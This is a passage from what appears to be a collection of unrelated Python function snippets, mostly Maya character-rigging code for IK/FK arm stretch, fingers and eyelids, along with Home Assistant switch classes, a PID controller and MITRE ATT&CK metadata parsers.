root_to_end_dist = utils.create_distance_reader(arm_root_grp, ik_last_node)\n root_to_pv_dist = utils.create_distance_reader(arm_root_grp, pv_ctrl)\n pv_to_end_dist = utils.create_distance_reader(pv_ctrl, ik_last_node)\n\n # easy stuff first - create fk stretch nodes\n lo_arm_fk_mdl = mc.createNode('multDoubleLinear')\n wrist_fk_mdl = mc.createNode('multDoubleLinear')\n\n mc.setAttr(lo_arm_fk_mdl+'.input1', mc.getAttr(lo_arm_ik_jnt+'.tx'))\n mc.setAttr(wrist_fk_mdl+'.input1', mc.getAttr(wrist_ik_jnt+'.tx'))\n mc.connectAttr(up_arm_fk_ctrl+'.stretch', lo_arm_fk_mdl+'.input2')\n mc.connectAttr(lo_arm_fk_ctrl+'.stretch', wrist_fk_mdl+'.input2')\n\n utils.connect_abs(lo_arm_fk_mdl+'.output', lo_arm_fk_ctrl+'_ZERO.tx')\n if wrist_fk_ctrl and mc.objExists(wrist_fk_ctrl):\n utils.connect_abs(wrist_fk_mdl+'.output', wrist_fk_ctrl+'_ZERO.tx')\n\n # These arethe final fk stretch outputs to connect to joints\n fk_stretch_final_output = [lo_arm_fk_mdl+'.output', wrist_fk_mdl+'.output']\n\n # NOW creates node s for thew elbow pin\n lo_arm_pin_mdl = mc.createNode('multDoubleLinear')\n wrist_pin_mdl = mc.createNode('multDoubleLinear')\n\n mc.setAttr(lo_arm_pin_mdl+'.input1', 1)\n mc.setAttr(wrist_pin_mdl+'.input1', 1)\n\n if lo_init_length < 0.0:\n mc.setAttr(lo_arm_pin_mdl+'.input1', -1)\n\n if wrist_init_length < 0.0:\n mc.setAttr(wrist_pin_mdl+'.input1', -1)\n\n mc.connectAttr(root_to_pv_dist+'.localDistance', lo_arm_pin_mdl+'.input2')\n mc.connectAttr(pv_to_end_dist+'.localDistance', wrist_pin_mdl+'.input2')\n\n # These arethe final elbow pin stretch outputs to connect to joints\n pin_final_output = [lo_arm_pin_mdl+'.output', wrist_pin_mdl+'.output']\n\n # create shift nodes\n mc.addAttr(lo_arm_ik_jnt, ln='shiftLength', k=1)\n mc.addAttr(wrist_ik_jnt, ln='shiftLength', k=1)\n\n tt = 'linear'\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=lo_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=0, itt=tt, ott=tt)\n mc.setDrivenKeyframe(lo_arm_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=max_init_length, itt=tt, ott=tt)\n\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=0, v=wrist_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=1, v=max_init_length, itt=tt, ott=tt)\n mc.setDrivenKeyframe(wrist_ik_jnt+'.shiftLength', cd=ik_ctrl+'.'+shift_attr_name, dv=-1, v=0, itt=tt, ott=tt)\n\n shift_final_output = [ lo_arm_ik_jnt+'.shiftLength', wrist_ik_jnt+'.shiftLength']\n\n # Create ik indivisual stretch nodes\n lo_arm_ik_scale_mdl = mc.createNode('multDoubleLinear')\n wrist_ik_scale_mdl = mc.createNode('multDoubleLinear')\n\n mc.connectAttr(shift_final_output[0], lo_arm_ik_scale_mdl+'.input1')\n mc.connectAttr(shift_final_output[1], wrist_ik_scale_mdl+'.input1')\n mc.connectAttr(ik_ctrl+'.upStretch', lo_arm_ik_scale_mdl+'.input2')\n mc.connectAttr(ik_ctrl+'.loStretch', wrist_ik_scale_mdl+'.input2')\n\n # This is the final output for scale and shift\n ik_stretch_final_output = [lo_arm_ik_scale_mdl+'.output', wrist_ik_scale_mdl+'.output']\n\n # Now create the IK auto stretch nodes\n lo_auto_stretch_mdl = mc.createNode('multDoubleLinear')\n wrist_auto_stretch_mdl = mc.createNode('multDoubleLinear')\n\n auto_stretch_clamp = mc.createNode('clamp')\n mc.setAttr(auto_stretch_clamp+'.minR', 1)\n mc.setAttr(auto_stretch_clamp+'.maxR', 10000000)\n\n mc.connectAttr(ik_stretch_final_output[0], lo_auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(ik_stretch_final_output[1], wrist_auto_stretch_mdl+'.input1', f=1)\n mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR')\n\n mc.connectAttr(auto_stretch_clamp+'.outputR', lo_auto_stretch_mdl+'.input2', f=1)\n mc.connectAttr(auto_stretch_clamp+'.outputR', wrist_auto_stretch_mdl+'.input2', f=1)\n\n adl = mc.createNode('addDoubleLinear')\n mc.connectAttr(lo_arm_ik_scale_mdl+'.output', adl+'.input1')\n mc.connectAttr(wrist_ik_scale_mdl+'.output', adl+'.input2')\n utils.connect_abs(adl+'.output', root_to_end_dist+'.jointChainLength')\n\n # handle soft ik handle constraint override\n pc = mc.pointConstraint(ik_last_node, ik_handle)[0]\n if mc.objExists(up_arm_ik_jnt+'.softIkChainLength'):\n\n # compensate feed in new chain length for soft ik chain length\n utils.connect_abs(adl+'.output', up_arm_ik_jnt+'.softIkChainLength')\n\n # blend off the soft ik constraint IF im in auto s tretch or pin mode\n mdl = mc.createNode('multDoubleLinear')\n utils.connect_reverse(ik_ctrl+'.'+pin_attr_name, mdl+'.input1')\n utils.connect_reverse(ik_ctrl+'.autoStretch', mdl+'.input2')\n mc.connectAttr(mdl+'.output', pc+'.w0')\n utils.connect_reverse(pc+'.w0', pc+'.w1')\n\n ik_auto_stretch_final_output = [lo_auto_stretch_mdl+'.output', wrist_auto_stretch_mdl+'.output']\n\n # now create all my blends\n\n # first blend btween FK and an empty ik input\n # (this ikl input will take another blend node for blending oall the IK options )\n fk_to_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.blender')\n mc.connectAttr(fk_stretch_final_output[0], fk_to_ik_blend+'.color2R')\n mc.connectAttr(fk_stretch_final_output[1], fk_to_ik_blend+'.color2G')\n\n # now create a blender between pin elbow and the rest of the ik options\n auto_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(ik_ctrl+'.autoStretch', auto_ik_blend+'.blender')\n mc.connectAttr(ik_auto_stretch_final_output[0], auto_ik_blend+'.color1R')\n mc.connectAttr(ik_auto_stretch_final_output[1], auto_ik_blend+'.color1G')\n\n # Now connect it toth fk blend\n mc.connectAttr(auto_ik_blend+'.outputR', fk_to_ik_blend+'.color1R')\n mc.connectAttr(auto_ik_blend+'.outputG', fk_to_ik_blend+'.color1G')\n\n # now create a blender between pin elbow and the rest of the ik options\n pin_ik_blend = mc.createNode('blendColors')\n\n mc.connectAttr(ik_ctrl+'.'+pin_attr_name, pin_ik_blend+'.blender')\n mc.connectAttr(pin_final_output[0], pin_ik_blend+'.color1R')\n mc.connectAttr(pin_final_output[1], pin_ik_blend+'.color1G')\n\n # Now connect it toth fk blend\n mc.connectAttr(pin_ik_blend+'.outputR', auto_ik_blend+'.color2R')\n mc.connectAttr(pin_ik_blend+'.outputG', auto_ik_blend+'.color2G')\n\n # now connect the shift and scale\n mc.connectAttr(ik_stretch_final_output[0], pin_ik_blend+'.color2R')\n mc.connectAttr(ik_stretch_final_output[1], pin_ik_blend+'.color2G')\n\n # now for the magic! Connect the blend networll to joints\n mc.connectAttr(fk_to_ik_blend+'.outputR', lo_arm_ik_jnt+'.tx')\n mc.connectAttr(fk_to_ik_blend+'.outputG', wrist_ik_jnt+'.tx')", "def create(cls, client_object, backing=None):\n vm = client_object.parent.vm\n pylogger.debug(\"Calling create on %s with network_label %s\" % (vm.name,\n backing.name))\n bridge = backing.get_bridge()\n return vm.create_vif(bridge)", "def run(params, rig):\n\n # Make sure matrixNodes plugin is loaded\n if not cmds.pluginInfo('matrixNodes', q=True, l=True):\n cmds.loadPlugin('matrixNodes')\n\n # Gather Task Data\n controls = list()\n controls.append(params['ikRootControl'].name())\n controls.append(params['ikPoleControl'].name())\n controls.append(params['ikGoalControl'].name())\n\n # Create IK Setup\n skeleton = [x.name() for x in params['ikSkeleton']]\n ik_joints = duplicate_joints(skeleton, 'ik')\n ik_chain_offset = group_with_transform(ik_joints[0])\n cmds.parent(ik_chain_offset, rig['rigGroup'])\n ik_handle, pole_crv, ik_buffer = create_ik_setup(controls, ik_joints)\n cmds.parent(pole_crv, rig['rigGroup'])\n\n # Run FK Setup\n fk_buffers = fk_run(params, rig)\n\n # Check if IK FK Switch is checked if so run its Setup\n switch_setup(params, rig, ik_joints)\n if params['fkIkSwitch'] is True:\n switch_setup(params, rig, ik_joints)\n\n visibility_attributes(params, fk_buffers, ik_buffer)\n if params['addIkPoleControlFollow']:\n follow_attribute(params)\n\n for x, y in zip(ik_joints, skeleton):\n cmds.pointConstraint(x, y, mo=False)\n cmds.orientConstraint(x, y, mo=False)\n cmds.scaleConstraint(x, y, mo=False)", "def __init__(self, attck_obj = None, **kwargs):\n\n self.attck_obj = attck_obj\n\n self.id = super(AttckMalware, self)._set_id(kwargs)\n self.created_by_ref = super(AttckMalware, self)._set_attribute(kwargs, 'created_by_ref')\n self.name = super(AttckMalware, self)._set_attribute(kwargs, 'name')\n self.aliases = super(AttckMalware, self)._set_list_items(kwargs, 'x_mitre_aliases')\n self.platforms = super(AttckMalware, self)._set_list_items(kwargs, 'x_mitre_platforms')\n self.labels = super(AttckMalware, self)._set_list_items(kwargs, 'labels')\n self.description = super(AttckMalware, self)._set_attribute(kwargs, 'description')\n self.external_references = super(AttckMalware, self)._set_reference(kwargs)\n self.created = super(AttckMalware, self)._set_attribute(kwargs, 'created')\n self.modified = super(AttckMalware, self)._set_attribute(kwargs, 'modified')\n self.stix = super(AttckMalware, self)._set_attribute(kwargs, 'id')\n self.type = super(AttckMalware, self)._set_attribute(kwargs, 'type')\n self.wiki = super(AttckMalware, self)._set_wiki(kwargs)\n self.contributor = super(AttckMalware, self)._set_list_items(kwargs, 'x_mitre_contributors')\n self.revoked = super(AttckMalware, self)._set_attribute(kwargs, 'revoked')", "def set_key(attr):\n cmds.setKeyframe(attr)", "def set_control(self, control):\n self.o.write_register(self.dev_id, CONTROL, control)", "def __init__(\n self,\n avm_wrapper: AvmWrapper,\n device_friendly_name: str,\n network_num: int,\n network_name: str,\n ) -> None:\n self._avm_wrapper = avm_wrapper\n\n self._attributes = {}\n self._attr_entity_category = EntityCategory.CONFIG\n self._network_num = network_num\n\n switch_info = SwitchInfo(\n description=f\"Wi-Fi {network_name}\",\n friendly_name=device_friendly_name,\n icon=\"mdi:wifi\",\n type=SWITCH_TYPE_WIFINETWORK,\n callback_update=self._async_fetch_update,\n callback_switch=self._async_switch_on_off_executor,\n )\n super().__init__(self._avm_wrapper, device_friendly_name, switch_info)", "def _add_switch(self, switchdesc):\n # Check switch definition parameters\n switch_attributes = list(switchdesc.keys())\n if not set(switch_attributes).issubset(self.switch_attributes):\n raise ValueError(\n \"Switch definition: '{0}' defined in '{1}' is not supported. \"\n \"Supported switch parameters are '{2}'.\".format(\n json.dumps(switchdesc, indent=2), self._xmlfile,\n self.switch_attributes))\n for mandatory_parameter in self.switch_attributes[:2]:\n if mandatory_parameter not in switch_attributes:\n raise ValueError(\n \"A '{0}' parameter is required in switch definition: \"\n \"'{1}' defined in '{2}'.\".format(\n mandatory_parameter, json.dumps(switchdesc, indent=2),\n self._xmlfile))\n\n # Check the name of the switch is not already reserved\n switch_name = switchdesc[self.switch_attributes[0]][0]\n if switch_name in self._switches:\n raise ValueError(\n \"The switch name '{0}' defined in '{1}' is \"\n \"already used.\".format(switch_name, self._xmlfile))\n\n # Create the switch control\n switch_paths = {}\n for pathdesc in switchdesc[self.switch_attributes[1]]:\n path_name = pathdesc[self.switch_path[0]][0]\n path_boxes = [box[self.unit_attributes[0]]\n for box in pathdesc[self.switch_path[1]]]\n switch_paths[path_name] = path_boxes\n switch_keys = list(switch_paths.keys())\n control = controls[\"Enum\"](\n choices=tuple(switch_keys),\n switch_name=switch_name,\n desc=(\"Switch between paths '{0}:{1}' defined in pipeline '{2}'\"\n \".\".format(switch_name, \"-\".join(switch_keys), self.id)))\n setattr(self.inputs, switch_name, control)\n self._switches[switch_name] = switch_paths\n control.add_observer(\"value\", self._update_activation)\n control.value = switch_keys[0]", "def buildWrist(wrist_ctrl=None, wrist_jnt=None, fingeramount=5, rot_ax=\"Y\"):\n selection = mc.ls(sl=True)\n\n if not selection and (not wrist_jnt or not wrist_ctrl):\n print \"Please select the wrist joint then the wrist controller\"\n return\n if not wrist_ctrl:\n wrist_ctrl = selection[1]\n if not wrist_jnt:\n wrist_jnt = selection[0]\n\n mc.parentConstraint(wrist_jnt, wrist_ctrl, mo=True)\n\n finger_jnts = mc.listRelatives(wrist_jnt, allDescendents=True)\n numfinger_jnts = len(finger_jnts)/fingeramount\n\n print \"fingeramount: \", fingeramount\n for i in range(fingeramount):\n\n singlefinger_jnts = finger_jnts[(numfinger_jnts * i): numfinger_jnts * (i+1)]\n singlefinger_jnts.reverse()\n singlefinger_jnts.pop()\n attrname = getAttrName(singlefinger_jnts[0])\n mc.addAttr(wrist_ctrl, longName=attrname, attributeType=\"float\", keyable=True)\n\n print \"singlefinger_jnts \", singlefinger_jnts\n\n fk_ctrls = FKChain.buildFKChain(fk_joints=singlefinger_jnts, ctrl_scale=0.5, keyword=\"jnt\", createXtra_grp=True)\n\n print \"FK Controllers: \", fk_ctrls\n\n outergrp = \"\"\n\n for j, fk in enumerate(fk_ctrls):\n ctrlgrp = mc.listRelatives(fk, parent=True)[0]\n\n if j == 0:\n temp = mc.listRelatives(ctrlgrp, parent=True)[0]\n outergrp = temp\n mc.connectAttr(\"%s.%s\"%(wrist_ctrl, attrname), \"%s.rotate%s\"%(ctrlgrp, rot_ax))\n\n print \"outer grp\", outergrp\n print \"wrist_ctrl\", wrist_ctrl\n\n mc.parent(outergrp, wrist_ctrl)", "def ikHandleCtx(*args, autoPriorityH: bool=True, createCurve: bool=True, createRootAxis:\n bool=True, exists: bool=True, forceSolverH: bool=True, history: bool=True,\n image1: Union[AnyStr, bool]=\"\", image2: Union[AnyStr, bool]=\"\", image3:\n Union[AnyStr, bool]=\"\", name: AnyStr=\"\", numSpans: int=1, parentCurve:\n bool=True, poWeightH: Union[float, bool]=1, priorityH: Union[int, bool]=1,\n rootOnCurve: bool=True, rootTwistMode: bool=True, simplifyCurve: bool=True,\n snapCurve: bool=True, snapHandleH: bool=True, solverTypeH: Union[AnyStr,\n bool]=\"\", stickyH: Union[AnyStr, bool]=\"off\", twistType: AnyStr=\"linear\",\n weightH: Union[float, bool]=1, q=True, query=True, e=True, edit=True,\n **kwargs)->Union[AnyStr, Any]:\n pass", "def __init__(self, kind, kappa, xi):\n self.kappa = kappa\n\n self.xi = xi\n\n if kind not in ['ucb', 'ei', 'poi']:\n err = \"The utility function \" \\\n \"{} has not been implemented, \" \\\n \"please choose one of ucb, ei, or poi.\".format(kind)\n raise NotImplementedError(err)\n else:\n self.kind = kind", "def ikHandle(*args, autoPriority: bool=True, connectEffector: bool=True, createCurve: bool=True,\n createRootAxis: bool=True, curve: Union[name, bool]=None, disableHandles:\n bool=True, enableHandles: bool=True, endEffector: Union[AnyStr, bool]=\"\", exists:\n AnyStr=\"\", forceSolver: bool=True, freezeJoints: bool=True, jointList: bool=True,\n name: Union[AnyStr, bool]=\"\", numSpans: int=0, parentCurve: bool=True,\n positionWeight: Union[float, bool]=0.0, priority: Union[int, bool]=0, rootOnCurve:\n bool=True, rootTwistMode: bool=True, setupForRPsolver: bool=True, simplifyCurve:\n bool=True, snapCurve: bool=True, snapHandleFlagToggle: bool=True,\n snapHandleToEffector: bool=True, solver: Union[AnyStr, bool]=\"\", startJoint:\n Union[AnyStr, bool]=\"\", sticky: Union[AnyStr, bool]=\"\", twistType: Union[AnyStr,\n bool]=\"\", weight: Union[float, bool]=0.0, q=True, query=True, e=True, edit=True,\n **kwargs)->Union[AnyStr, Any]:\n pass", "def __init__(self, goal=0, kP=1, kI=1, kD=1, init_pt=0):\n self._pid_lock = threading.Lock()\n\n self.set_goal(goal)\n self.reset(init_pt)\n self.set_gains({\n PIDController.KP_KEY: kP,\n PIDController.KI_KEY: kI,\n PIDController.KD_KEY: kD\n })", "def build_cntrl(self):\n tk.Label(self.cntrl_frame, text = \"Select\\nUniverse:\").pack(side = tk.LEFT)\n menu = tk.OptionMenu(self.cntrl_frame, self.universe, *self.universe_list, \n command = self.set_universe)\n menu.pack(side = tk.LEFT)\n discover_button = tk.Button(self.cntrl_frame, text = \"Discover\", \n command = self.discover)\n discover_button.pack(side = tk.LEFT)\n self.dev_label = tk.StringVar(self.root)\n self.dev_label.set(\"Devices\")\n self.device_menu = tk.OptionMenu(self.cntrl_frame, self.dev_label, [])\n # self.device_menu[\"menu\"].config(tearoff = 0)\n self.device_menu.pack(side = tk.LEFT)\n self.id_box = tk.Checkbutton(self.cntrl_frame, text = \"Identify\", \n variable = self.id_state, \n command = self.identify)\n self.id_box.pack(side = tk.LEFT)\n self.auto_disc_box = tk.Checkbutton(self.cntrl_frame, \n text = \"Automatic\\nDiscovery\",\n variable = self.auto_disc, \n command = self.discover)\n self.auto_disc_box.pack(side = tk.LEFT)", "def _setbgpic(self, item, image):\n self.cv.itemconfig(item, image=image)\n self.cv.tag_lower(item)", "def __init__(self, coordinator, upv, camera, switch_type, ir_on, ir_off):\n self.coordinator = coordinator\n self.upv = upv\n self._camera_id = camera\n self._camera = self.coordinator.data[camera]\n self._name = \"{0} {1} {2}\".format(\n DOMAIN.capitalize(), SWITCH_TYPES[switch_type][0], self._camera[\"name\"]\n )\n self._unique_id = self._name.lower().replace(\" \", \"_\")\n self._icon = \"mdi:{}\".format(SWITCH_TYPES.get(switch_type)[1])\n self._ir_on_cmd = ir_on\n self._ir_off_cmd = ir_off\n self._camera_type = self._camera[\"type\"]\n self._attr = SWITCH_TYPES.get(switch_type)[2]\n self._switch_type = SWITCH_TYPES.get(switch_type)[2]\n _LOGGER.debug(\"UnifiProtectSwitch: %s created\", self._name)\n _LOGGER.debug(\n \"UnifiProtectSwitch: IR_ON %s IR_OFF %s\", self._ir_on_cmd, self._ir_off_cmd\n )", "def __init__(\n self,\n avm_wrapper: AvmWrapper,\n device_friendly_name: str,\n switch_info: SwitchInfo,\n ) -> None:\n super().__init__(avm_wrapper, device_friendly_name)\n\n self._description = switch_info[\"description\"]\n self._friendly_name = switch_info[\"friendly_name\"]\n self._icon = switch_info[\"icon\"]\n self._type = switch_info[\"type\"]\n self._update = switch_info[\"callback_update\"]\n self._switch = switch_info[\"callback_switch\"]\n\n self._name = f\"{self._friendly_name} {self._description}\"\n self._unique_id = f\"{self._avm_wrapper.unique_id}-{slugify(self._description)}\"\n\n self._attributes: dict[str, str] = {}\n self._is_available = True", "def setSDK(attrDrv,attrDrvn,valDrv,valDrvn,typeKey = 'linear',infinity=1,sel = None):\n if sel==None:\n sel = pm.ls(sl=1)\n driver = sel[0]\n driven = sel[1]\n for i in range(0,len(attrDrvn)):\n for a in range (0,len(valDrv[i])):\n pm.setDrivenKeyframe(driven,cd = (driver + '.'+attrDrv),at = attrDrvn[i],v = valDrvn[i][a],dv = valDrv[i][a],itt = typeKey,ott = typeKey)\n #pm.setDrivenKeyframe(driven,cd = (driver + '.'+attrDrv),at = attrDrvn[i],v = valDrv[i][-1],dv = valDrv[i][-1],itt = typeKey,ott = typeKey)\n #set infinity\n if infinity==1:\n for i in range(0,len(attrDrvn)):\n #convert attr from short name to long name\n attr = attrDrvn[i]\n if attrDrvn[i]=='tx':attr = 'translateX'\n if attrDrvn[i]=='ty':attr = 'translateY'\n if attrDrvn[i]=='tz':attr = 'translateZ'\n if attrDrvn[i]=='rx':attr = 'rotateX'\n if attrDrvn[i]=='ry':attr = 'rotateY'\n if attrDrvn[i]=='rz':attr = 'rotateZ'\n if attrDrvn[i]=='sx':attr = 'scaleX'\n if attrDrvn[i]=='sy':attr = 'scaleY'\n if attrDrvn[i]=='sz':attr = 'scaleZ'\n if attrDrvn[i]=='v':attr = 'visibility'\n #add infinity key\n pm.selectKey(driven + '_' + attr,add=1,k=1)\n pm.keyTangent (itt= 'spline', ott= 'spline')\n pm.setInfinity(poi='linear',pri='linear')", "def __init__(self):\n\n # Diccionario que contendra todas las fuentes para ir llamandolas una por una en ejecucion\n # o poder seleccionar cual lanzar usando el patron factoria a traves de esta clase\n\n self.controller_objects = {'iptables': IptablesController}", "def test_indicate(self):\n self.objective.Indicate()", "def test_indicate(self):\n self.objective.Indicate()", "def __init__( self, owner, shoulderindex, wristindex, ctrlindex=0 ):\n\t\tself.shoulder = ServoJoint( owner, shoulderindex, ctrlindex ) \n\t\tself.wrist = ServoJoint( owner, wristindex, ctrlindex )", "def ct(self, q0, q1, ctrl=None):\n self.__add_quantum_gate(kind=CONTROLLED_T, qid=[q0,q1], ctrl=ctrl)\n return self", "def __init__(self):\n self.key = None\n self.name = None\n self.menu = None\n self.ictype = None\n self.icind1 = None\n self.icind2 = None\n self.iexist = None\n self.icname = None", "def vehicle_controller(self, entity, veh_id, agent, agent_camera, is_ego):\n if is_ego:\n controller_id = f\"HeroAgent_{veh_id}\"\n else:\n controller_id = f\"VehicleAgent_{veh_id}\"\n\n private_act = etree.SubElement(entity, \"PrivateAction\")\n controller_act = etree.SubElement(private_act, \"ControllerAction\")\n controller_assign = etree.SubElement(controller_act, \"AssignControllerAction\")\n controller = etree.SubElement(controller_assign, \"Controller\")\n controller.set(\"name\", controller_id)\n controller_properties_group = etree.SubElement(controller, \"Properties\")\n controller_properties = etree.SubElement(controller_properties_group, \"Property\")\n controller_properties.set(\"name\", \"module\")\n if agent == \"simple_vehicle_control\":\n controller_properties.set(\"value\", agent)\n attach_camera = etree.SubElement(controller_properties_group, \"Property\")\n attach_camera.set(\"name\", \"attach_camera\")\n attach_camera.set(\"value\", agent_camera)\n else:\n controller_properties.set(\"value\", agent)\n\n overrides = etree.SubElement(controller_act, \"OverrideControllerValueAction\")\n override_throttle = etree.SubElement(overrides, \"Throttle\")\n override_throttle.set(\"value\", \"0\")\n override_throttle.set(\"active\", \"false\")\n override_brake = etree.SubElement(overrides, \"Brake\")\n override_brake.set(\"value\", \"0\")\n override_brake.set(\"active\", \"false\")\n override_clutch = etree.SubElement(overrides, \"Clutch\")\n override_clutch.set(\"value\", \"0\")\n override_clutch.set(\"active\", \"false\")\n override_parking_brake = etree.SubElement(overrides, \"ParkingBrake\")\n override_parking_brake.set(\"value\", \"0\")\n override_parking_brake.set(\"active\", \"false\")\n override_steering = etree.SubElement(overrides, \"SteeringWheel\")\n override_steering.set(\"value\", \"0\")\n override_steering.set(\"active\", \"false\")\n override_gear = etree.SubElement(overrides, \"Gear\")\n override_gear.set(\"number\", \"0\")\n override_gear.set(\"active\", \"false\")", "def __setattr__(self, name, attr):\n if self._init_complete and not hasattr(self, name):\n impl = self._get_client_impl()\n setattr(impl, name, attr)\n else:\n super(KeyVaultClient, self).__setattr__(name, attr)", "def __init__(__self__, *,\n kind: str,\n kms_key_name: str):\n pulumi.set(__self__, \"kind\", kind)\n pulumi.set(__self__, \"kms_key_name\", kms_key_name)", "def __init__(self, attck_obj = None, **kwargs):\n\n self.attck_obj = attck_obj\n\n self.id = super(AttckTools, self)._set_id(kwargs)\n self.name = super(AttckTools, self)._set_attribute(kwargs, 'name')\n self.alias = super(AttckTools, self)._set_attribute(kwargs, 'aliases')\n self.description = super(AttckTools, self)._set_attribute(kwargs, 'description')\n self.reference = super(AttckTools, self)._set_reference(kwargs)\n self.created = super(AttckTools, self)._set_attribute(kwargs, 'created')\n self.modified = super(AttckTools, self)._set_attribute(kwargs, 'modified')\n self.stix = super(AttckTools, self)._set_attribute(kwargs, 'id')\n self.type = super(AttckTools, self)._set_attribute(kwargs, 'type')\n self.wiki = super(AttckTools, self)._set_wiki(kwargs)\n self.contributor = super(AttckTools, self)._set_attribute(kwargs, 'contributor')", "def __init__(self, *args):\n moose.HHChannel.__init__(self,*args)\n self.Ek = VKDR\n self.Gbar = GKDR\n self.addField('ion')\n self.setField('ion','K')\n self.Xpower = 1 # This will create HHGate instance xGate inside the Na channel\n #self.Ypower = 0 # This will create HHGate instance yGate inside the Na channel\n ## Below gates get created after Xpower or Ypower are set to nonzero values\n ## I don't anymore have to explicitly create these attributes in the class\n #self.xGate = moose.HHGate(self.path + \"/xGate\")\n #self.yGate = moose.HHGate(self.path + \"/yGate\")\n self.xGate.A.xmin = VMIN\n self.xGate.A.xmax = VMAX\n self.xGate.A.xdivs = NDIVS\n self.xGate.B.xmin = VMIN\n self.xGate.B.xmax = VMAX\n self.xGate.B.xdivs = NDIVS\n \n v = VMIN\n\n for i in range(NDIVS+1):\n mtau = calc_KA_mtau(v)\n self.xGate.A[i] = calc_KA_minf(v)/mtau\n self.xGate.B[i] = 1.0/mtau\n v = v + dv", "def __setattr__(self, name, value):\n if name == 'actor_ref' or name.startswith('_'):\n return super(ActorProxy, self).__setattr__(name, value)\n attr_path = self._attr_path + (name,)\n message = {\n 'command': 'pykka_setattr',\n 'attr_path': attr_path,\n 'value': value,\n }\n return self.actor_ref.ask(message)", "def setup_fourCtrl(lf_lidrails, rt_lidrails):\n # Declare control variables\n lf_up = ['L_upperLid1_ctrl', 'L_upperLid2_ctrl', 'L_upperLid3_ctrl', 'L_upperLid4_ctrl']\n lf_dn = ['L_lowerLid1_ctrl', 'L_lowerLid2_ctrl', 'L_lowerLid3_ctrl', 'L_lowerLid4_ctrl']\n rt_up = ['R_upperLid1_ctrl', 'R_upperLid2_ctrl', 'R_upperLid3_ctrl', 'R_upperLid4_ctrl']\n rt_dn = ['R_lowerLid1_ctrl', 'R_lowerLid2_ctrl', 'R_lowerLid3_ctrl', 'R_lowerLid4_ctrl']\n\n # Connect lidRails ramps to lid profile controls\n\n # lf_up =========\n\n # inner\n cmds.connectAttr(lf_up[0] + '.tx', lf_lidrails + '.offsettop[0].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[0] + '.ty', lf_lidrails + '.offsettop[0].offsettop_FloatValue', f=True)\n # mid - inner\n lf_lid01_um01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_um01_addDoubleLinear')\n cmds.connectAttr(lf_up[1] + '.tx', lf_lid01_um01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_um01_adn + '.input2', 0.333)\n cmds.connectAttr(lf_lid01_um01_adn + '.output', lf_lidrails + '.offsettop[1].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[1] + '.ty', lf_lidrails + '.offsettop[1].offsettop_FloatValue', f=True)\n # mid - outer\n lf_lid01_um02_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_um02_addDoubleLinear')\n cmds.connectAttr(lf_up[2] + '.tx', lf_lid01_um02_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_um02_adn + '.input2', 0.666)\n cmds.connectAttr(lf_lid01_um02_adn + '.output', lf_lidrails + '.offsettop[2].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[2] + '.ty', lf_lidrails + '.offsettop[2].offsettop_FloatValue', f=True)\n # outer\n lf_lid01_uo01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_uo01_addDoubleLinear')\n cmds.connectAttr(lf_up[3] + '.tx', lf_lid01_uo01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_uo01_adn + '.input2', 1.0)\n cmds.connectAttr(lf_lid01_uo01_adn + '.output', lf_lidrails + '.offsettop[3].offsettop_Position', f=True)\n cmds.connectAttr(lf_up[3] + '.ty', lf_lidrails + '.offsettop[3].offsettop_FloatValue', f=True)\n\n # lf_dn =========\n\n lf_dn_rvn = cmds.createNode('reverse', n='lf_lid01_dn01_reverse')\n lf_dn02_rvn = cmds.createNode('reverse', n='lf_lid01_dn02_reverse')\n # inner\n cmds.connectAttr(lf_dn[0] + '.tx', lf_lidrails + '.offsetbottom[0].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[0] + '.ty', lf_dn_rvn + '.inputX', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputX', lf_lidrails + '.offsetbottom[0].offsetbottom_FloatValue', f=True)\n # mid - inner\n lf_lid01_dm01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_dm01_addDoubleLinear')\n cmds.connectAttr(lf_dn[1] + '.tx', lf_lid01_dm01_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_dm01_adn + '.input2', 0.333)\n cmds.connectAttr(lf_lid01_dm01_adn + '.output', lf_lidrails + '.offsetbottom[1].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[1] + '.ty', lf_dn_rvn + '.inputY', f=True)\n cmds.connectAttr(lf_dn_rvn + '.outputY', lf_lidrails + '.offsetbottom[1].offsetbottom_FloatValue', f=True)\n # mid - outer\n lf_lid01_dm02_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_dm02_addDoubleLinear')\n cmds.connectAttr(lf_dn[2] + '.tx', lf_lid01_dm02_adn + '.input1', f=True)\n cmds.setAttr(lf_lid01_dm02_adn + '.input2', 0.666)\n cmds.connectAttr(lf_lid01_dm02_adn + '.output', lf_lidrails + '.offsetbottom[2].offsetbottom_Position', f=True)\n cmds.connectAttr(lf_dn[2] + '.ty', lf_dn02_rvn + '.inputX', f=True)\n cmds.connectAttr(lf_dn02_rvn + '.outputX', lf_lidrails + '.offsetbottom[2].offsetbottom_FloatValue', f=True)\n # outer\n lf_lid01_do01_adn = cmds.createNode('addDoubleLinear', n='lf_lid01_do01_addDoubleLinear')\n cmds.connectAttr(lf_dn[3] + '.tx', 